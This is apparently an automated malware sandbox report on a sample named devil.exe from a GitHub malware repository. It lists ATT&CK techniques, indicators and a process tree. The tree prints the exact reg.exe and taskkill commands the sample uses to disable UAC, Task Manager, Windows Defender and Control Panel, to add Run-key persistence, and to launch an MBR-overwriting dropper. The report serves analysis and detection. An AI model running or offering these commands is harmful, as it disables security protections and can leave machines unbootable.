hxxps://github[.]com/pankoza2-pl/malwaredatabase-old

Resubmissions

14/10/2024, 07:55

241014-jsglrawhnm 3

14/10/2024, 07:51

241014-jp2shswhmn 10

Analysis

max time kernel
89s
max time network
141s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
14/10/2024, 07:51

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

https://github.com/pankoza2-pl/malwaredatabase-old

Score

10^/10

bootkit discovery evasion persistence ransomware trojan upx

Malware Config

Signatures

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Disables Task Manager via registry modification
evasion

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation	cmd.exe

Executes dropped EXE 3 IoCs

pid	Process
1492	mbrsetup.exe
4308	r.exe
536	edr.exe

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\diedeath = "c:\\windows\\devilsecure\\death.txt"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\tunneleffect = "c:\\windows\\devilsecure\\tun.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\mbrsetupsecure = "c:\\windows\\devilsecure\\mbrsetup.exe"	reg.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
71	raw.githubusercontent.com
72	raw.githubusercontent.com

Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1542.003

description	ioc	Process
File opened for modification	\??\PhysicalDrive0	mbrsetup.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\Desktop\Wallpaper = "c:\\bg.bmp"	reg.exe

UPX packed file 3 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/4908-256-0x0000000000400000-0x000000000062E000-memory.dmp	upx
behavioral1/memory/4908-346-0x0000000000400000-0x000000000062E000-memory.dmp	upx
behavioral1/memory/4908-473-0x0000000000400000-0x000000000062E000-memory.dmp	upx

Drops file in Windows directory 5 IoCs

description	ioc	Process
File opened for modification	\??\c:\windows\devilsecure\mbrsetup.exe	cmd.exe
File created	C:\Windows\devilsecure\death.txt	cmd.exe
File created	\??\c:\windows\devilsecure\tun.exe	cmd.exe
File opened for modification	\??\c:\windows\devilsecure\tun.exe	cmd.exe
File created	\??\c:\windows\devilsecure\mbrsetup.exe	cmd.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	edr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
4304	taskkill.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings	cmd.exe

Modifies registry key 1 TTPs 6 IoCs

Modify Registry

T1112

pid	Process
4868	reg.exe
1908	reg.exe
3240	reg.exe
2256	reg.exe
2336	reg.exe
5040	reg.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
1364	NOTEPAD.EXE

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
3740	msedge.exe
3740	msedge.exe
636	msedge.exe
636	msedge.exe
2324	identity_helper.exe
2324	identity_helper.exe
2816	msedge.exe
2816	msedge.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
4812	cmd.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs

pid	Process
636	msedge.exe
636	msedge.exe
636	msedge.exe
636	msedge.exe
636	msedge.exe
636	msedge.exe
636	msedge.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	4304	taskkill.exe
Token: SeShutdownPrivilege	1808	shutdown.exe
Token: SeRemoteShutdownPrivilege	1808	shutdown.exe

Suspicious use of FindShellTrayWindow 33 IoCs

pid	Process
636	msedge.exe
636	msedge.exe
636	msedge.exe
636	msedge.exe
636	msedge.exe
636	msedge.exe
636	msedge.exe
636	msedge.exe
636	msedge.exe
636	msedge.exe
636	msedge.exe
636	msedge.exe
636	msedge.exe
636	msedge.exe
636	msedge.exe
636	msedge.exe
636	msedge.exe
636	msedge.exe
636	msedge.exe
636	msedge.exe
636	msedge.exe
636	msedge.exe
636	msedge.exe
636	msedge.exe
636	msedge.exe
636	msedge.exe
636	msedge.exe
636	msedge.exe
636	msedge.exe
636	msedge.exe
636	msedge.exe
636	msedge.exe
636	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
636	msedge.exe
636	msedge.exe
636	msedge.exe
636	msedge.exe
636	msedge.exe
636	msedge.exe
636	msedge.exe
636	msedge.exe
636	msedge.exe
636	msedge.exe
636	msedge.exe
636	msedge.exe
636	msedge.exe
636	msedge.exe
636	msedge.exe
636	msedge.exe
636	msedge.exe
636	msedge.exe
636	msedge.exe
636	msedge.exe
636	msedge.exe
636	msedge.exe
636	msedge.exe
636	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 636 wrote to memory of 3276	636	msedge.exe	85
PID 636 wrote to memory of 3276	636	msedge.exe	85
PID 636 wrote to memory of 3020	636	msedge.exe	86
PID 636 wrote to memory of 3020	636	msedge.exe	86
PID 636 wrote to memory of 3020	636	msedge.exe	86
PID 636 wrote to memory of 3020	636	msedge.exe	86
PID 636 wrote to memory of 3020	636	msedge.exe	86
PID 636 wrote to memory of 3020	636	msedge.exe	86
PID 636 wrote to memory of 3020	636	msedge.exe	86
PID 636 wrote to memory of 3020	636	msedge.exe	86
PID 636 wrote to memory of 3020	636	msedge.exe	86
PID 636 wrote to memory of 3020	636	msedge.exe	86
PID 636 wrote to memory of 3020	636	msedge.exe	86
PID 636 wrote to memory of 3020	636	msedge.exe	86
PID 636 wrote to memory of 3020	636	msedge.exe	86
PID 636 wrote to memory of 3020	636	msedge.exe	86
PID 636 wrote to memory of 3020	636	msedge.exe	86
PID 636 wrote to memory of 3020	636	msedge.exe	86
PID 636 wrote to memory of 3020	636	msedge.exe	86
PID 636 wrote to memory of 3020	636	msedge.exe	86
PID 636 wrote to memory of 3020	636	msedge.exe	86
PID 636 wrote to memory of 3020	636	msedge.exe	86
PID 636 wrote to memory of 3020	636	msedge.exe	86
PID 636 wrote to memory of 3020	636	msedge.exe	86
PID 636 wrote to memory of 3020	636	msedge.exe	86
PID 636 wrote to memory of 3020	636	msedge.exe	86
PID 636 wrote to memory of 3020	636	msedge.exe	86
PID 636 wrote to memory of 3020	636	msedge.exe	86
PID 636 wrote to memory of 3020	636	msedge.exe	86
PID 636 wrote to memory of 3020	636	msedge.exe	86
PID 636 wrote to memory of 3020	636	msedge.exe	86
PID 636 wrote to memory of 3020	636	msedge.exe	86
PID 636 wrote to memory of 3020	636	msedge.exe	86
PID 636 wrote to memory of 3020	636	msedge.exe	86
PID 636 wrote to memory of 3020	636	msedge.exe	86
PID 636 wrote to memory of 3020	636	msedge.exe	86
PID 636 wrote to memory of 3020	636	msedge.exe	86
PID 636 wrote to memory of 3020	636	msedge.exe	86
PID 636 wrote to memory of 3020	636	msedge.exe	86
PID 636 wrote to memory of 3020	636	msedge.exe	86
PID 636 wrote to memory of 3020	636	msedge.exe	86
PID 636 wrote to memory of 3020	636	msedge.exe	86
PID 636 wrote to memory of 3740	636	msedge.exe	87
PID 636 wrote to memory of 3740	636	msedge.exe	87
PID 636 wrote to memory of 1436	636	msedge.exe	88
PID 636 wrote to memory of 1436	636	msedge.exe	88
PID 636 wrote to memory of 1436	636	msedge.exe	88
PID 636 wrote to memory of 1436	636	msedge.exe	88
PID 636 wrote to memory of 1436	636	msedge.exe	88
PID 636 wrote to memory of 1436	636	msedge.exe	88
PID 636 wrote to memory of 1436	636	msedge.exe	88
PID 636 wrote to memory of 1436	636	msedge.exe	88
PID 636 wrote to memory of 1436	636	msedge.exe	88
PID 636 wrote to memory of 1436	636	msedge.exe	88
PID 636 wrote to memory of 1436	636	msedge.exe	88
PID 636 wrote to memory of 1436	636	msedge.exe	88
PID 636 wrote to memory of 1436	636	msedge.exe	88
PID 636 wrote to memory of 1436	636	msedge.exe	88
PID 636 wrote to memory of 1436	636	msedge.exe	88
PID 636 wrote to memory of 1436	636	msedge.exe	88
PID 636 wrote to memory of 1436	636	msedge.exe	88
PID 636 wrote to memory of 1436	636	msedge.exe	88
PID 636 wrote to memory of 1436	636	msedge.exe	88
PID 636 wrote to memory of 1436	636	msedge.exe	88

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/pankoza2-pl/malwaredatabase-old
1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:636
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffbc80b46f8,0x7ffbc80b4708,0x7ffbc80b4718
  2⤵
  PID:3276
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2136,7510180562547200375,18260817284558916105,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2224 /prefetch:2
  2⤵
  PID:3020
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2136,7510180562547200375,18260817284558916105,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2276 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3740
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2136,7510180562547200375,18260817284558916105,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2892 /prefetch:8
  2⤵
  PID:1436
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,7510180562547200375,18260817284558916105,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3236 /prefetch:1
  2⤵
  PID:4116
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,7510180562547200375,18260817284558916105,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3244 /prefetch:1
  2⤵
  PID:3404
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2136,7510180562547200375,18260817284558916105,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5444 /prefetch:8
  2⤵
  PID:1632
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2136,7510180562547200375,18260817284558916105,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5444 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2324
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,7510180562547200375,18260817284558916105,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1792 /prefetch:1
  2⤵
  PID:3104
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,7510180562547200375,18260817284558916105,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2032 /prefetch:1
  2⤵
  PID:1164
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2136,7510180562547200375,18260817284558916105,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5644 /prefetch:8
  2⤵
  PID:2372
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,7510180562547200375,18260817284558916105,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3504 /prefetch:1
  2⤵
  PID:4888
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2136,7510180562547200375,18260817284558916105,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5888 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2816
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,7510180562547200375,18260817284558916105,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5576 /prefetch:1
  2⤵
  PID:2192
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,7510180562547200375,18260817284558916105,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5764 /prefetch:1
  2⤵
  PID:1624
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2136,7510180562547200375,18260817284558916105,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5032 /prefetch:2
  2⤵
  PID:12584

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1180

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1556

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:2036

C:\Users\Admin\AppData\Local\Temp\Temp1_pankoza.devil.zip\devil.exe
"C:\Users\Admin\AppData\Local\Temp\Temp1_pankoza.devil.zip\devil.exe"
1⤵
PID:4908
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\devil.bat" "
  2⤵
  - Checks computer location settings
  - Drops file in Windows directory
  - Modifies registry class
  - Suspicious behavior: GetForegroundWindowSpam
  PID:4812
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im taskmgr.exe
    3⤵
    - System Location Discovery: System Language Discovery
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4304
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d c:\bg.bmp /f
    3⤵
    - Sets desktop wallpaper using registry
    - System Location Discovery: System Language Discovery
    PID:4888
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:5056
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:3920
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:4260
- - C:\Windows\SysWOW64\reg.exe
    reg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1 /f
    3⤵
    - Modifies registry key
    PID:2256
- - C:\Windows\SysWOW64\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
    3⤵
    - Modifies registry key
    PID:2336
- - C:\Windows\SysWOW64\reg.exe
    reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
    3⤵
    - UAC bypass
    - Modifies registry key
    PID:5040
- - C:\Windows\SysWOW64\reg.exe
    Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:1400
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoControlPanel" /t REG_DWORD /d "1" /f
    3⤵
    PID:5072
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v diedeath /d c:\windows\devilsecure\death.txt /f
    3⤵
    - Adds Run key to start application
    - Modifies registry key
    PID:4868
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v tunneleffect /d c:\windows\devilsecure\tun.exe /f
    3⤵
    - Adds Run key to start application
    - Modifies registry key
    PID:1908
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v mbrsetupsecure /d c:\windows\devilsecure\mbrsetup.exe /f
    3⤵
    - Adds Run key to start application
    - Modifies registry key
    PID:3240
- - C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\mbrsetup.exe
    mbrsetup.exe
    3⤵
    - Executes dropped EXE
    - Writes to the Master Boot Record (MBR)
    PID:1492
- - C:\Windows\SysWOW64\NOTEPAD.EXE
    "C:\Windows\system32\NOTEPAD.EXE" C:\6666.txt
    3⤵
    - Opens file in notepad (likely ransom note)
    PID:1364
- - C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\r.exe
    r.exe
    3⤵
    - Executes dropped EXE
    PID:4308
- - C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\edr.exe
    edr.exe
    3⤵
    - Executes dropped EXE
